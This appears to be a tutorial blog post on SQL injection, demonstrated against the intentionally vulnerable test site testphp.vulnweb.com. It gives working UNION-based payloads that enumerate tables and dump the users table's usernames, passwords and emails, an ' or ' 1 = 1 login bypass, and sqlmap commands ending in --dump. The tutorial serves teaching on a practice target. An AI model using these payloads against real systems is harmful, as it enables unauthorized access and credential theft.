Introduction
SQL Injection is a common flaw over systems where languages like PHP, ASP.NET, is used to make requests in databases. In this basic attack, can be dumped informations from news and users passwords or until administration credentials. In this topic i’ll explain the basic of manual SQLi and automatic tools like SQLMap.
SQL Injection
For this explanation i’ll use *http://testphp.vulnweb.com*
Manual SQL Injection
Initially, we need to find vulnerable parameters, in this case:
http://testphp.vulnweb.com/artists.php?artist=1At this point, we need to test if this parameter is really vulnerable. With a single quote we can find out:
http://testphp.vulnweb.com/artists.php?artist=1'And the expected result is:
As you can see, this payload returned an error, that means this website might vulnerable.
Now, we need to know the number of tables, with order by we can enumerate the number of tables with 1 order by 1-- changing number by 2, 3… until we receive a error message like above. Let’s try:
And…
We have an error, that means… The table ‘artists’ have 3 columns and we can manipulate them, but we need to know positions, let’s use -1 union select 1,2,3-- , and the return is:
The numbers we used overwrote the common output and now we know the positions and we can try to get the database name with -1 union select 1,2,database()-- , expected output is:
Now that we know the name of database, we can perform an attack to read all table names with -1 union select 1,2,group_concat(table_name,0x0a) from information_schema.tables where table_schema=database() let’s try that:
We can see a very interesting table named users , let’s try to expose your columns with -1 union select 1,2,group_concat(column_name,0x0a) from information_schema.columns where table_name='users' and we can see the column names:
This is very, very bad… But not for us! Let’s try to expose the content of columns uname , pass and email with -1 union select 1,2,group_concat(uname,0x0a,pass,0x0a,email) from acuart.users and we can get sensitive information easily:
With username and password, let’s try to login:
We can login with the stolen credentials!!!
Bonus: We can login without the stolen credentials too, with ' or ' 1 = 1 as username and password, we can login because the login form is vulnerable too:
Automated SQL Injection
Not everything is roses, manual SQL Injection can be useless if the target return blind errors ( Blind SQL Injection ), if the target has a huge database… But we have a solution, SQLMap!
You can get https://github.com/sqlmapproject/sqlmap
After installed, let’s try to expose data from the target. Initially we need to get the vulnerable parameter, in this case:
http://testphp.vulnweb.com/artists.php?artist=1And same as Manual SQL Injection recognize, we need a error message before adding single quotes too:
http://testphp.vulnweb.com/artists.php?artist=1'Now that we know the vulnerable parameter, let’s hack that! In your console write sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs and we can see available databases:
And we can try to get table names of acuart database, with sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables we can see table names:
The interesting table that we will expose is users, with sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns we can see column names:
Let’s try to dump the content of columns with sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname,pass,email --dump and we can get user test credentials:
Let’s try to login with the credentials:
I hope you liked this topic and use that with responsibility.